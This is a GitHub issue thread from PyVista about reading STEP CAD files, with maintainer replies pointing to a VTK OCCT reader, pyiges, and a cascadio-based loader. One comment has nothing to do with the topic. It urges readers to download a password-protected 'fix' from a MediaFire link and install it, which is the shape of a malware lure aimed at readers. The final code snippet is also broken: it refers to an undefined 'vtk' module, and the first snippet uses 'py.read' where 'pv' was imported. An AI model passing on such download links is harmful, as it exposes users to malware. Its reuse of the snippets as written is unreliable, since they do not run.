### ISSUE TITLE
Reading step CAD model, without relying on file conversion

### ISSUE THREAD

**Issue by tuu4208** [pyvista/pyvista#6573]
### Describe the feature you would like to be added.

Currently, when using file formats like STL and OBJ, 
CAD software often fails to convert properly due to issues with broken surfaces or complex features.

Exporting STEP files are stable by CAD software, but PyVista does not support STEP files now.
I would like to confirm whether PyVista will support the future.

``` py
import pyvista as pv
mesh = py.read("file.stp")
mesh.plot()
```

### Pseudocode or Screenshots

```python
Insert code here
```
Or drag your screenshot here!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by user27182** [comment]
I'm not 100% sure but I believe there is a vtk reader for this, but it's not shipped with vtk by default. So it can't be adapted for use by `pv.read` without also compiling an external library. See this PR: https://github.com/pyvista/pyvista/pull/5575

**Comment by tkoyama010** [comment]
It does not support step files, but there is a dedicated reader for iges file called [pyiges](https://github.com/pyvista/pyiges). We may need to create a reader for step files with this as a reference.

**Comment by tuu4208** [comment]
I had tried iges, but that format also not stable exporting by CAD software.
I found vtk step reader just now.
https://vtk.org/doc/nightly/html/classvtkOCCTReader.html

**Comment by tkoyama010** [comment]
> I had tried iges files, but that format also not stable exporting by CAD software (PTC Creo Parametric). I found vtk step reader just now. It's should work for pyvista supported in the future. https://vtk.org/doc/nightly/html/classvtkOCCTReader.html

Yes it it there. But as @user27182 said it can't be adapted for use by `pv.read` without also compiling an external library.

**Comment by akaszynski** [comment]
Those wishing to do this in as of March 2026 can load step files using `cascadio` and `pyvista` with:

```bash
pip install pyvista cascadio==0.0.18rc5
```

Note: `cascadio` release candidate may be removed at some point in the future, upgrade to the latest `cascadio` if that's the case.

```py
from pathlib import Path
import cascadio
from vtkmodules.vtkIOGeometry import vtkGLTFReader
from vtkmodules.vtkIOCore import vtkMemoryResourceStream

import pyvista as pv


def load_cad(filename: str | Path) -> pv.MultiBlock:
    with open(filename, "rb") as f:
        data = cascadio.load(f.read(), "step")

    stream = vtk.vtkMemoryResourceStream()
    stream.SetBuffer(data, len(data))

    reader = vtk.vtkGLTFReader()
    reader.SetStream(stream)
    reader.SetGLBStart(0)

    reader.Update()
    return pv.wrap(reader.GetOutput())
```
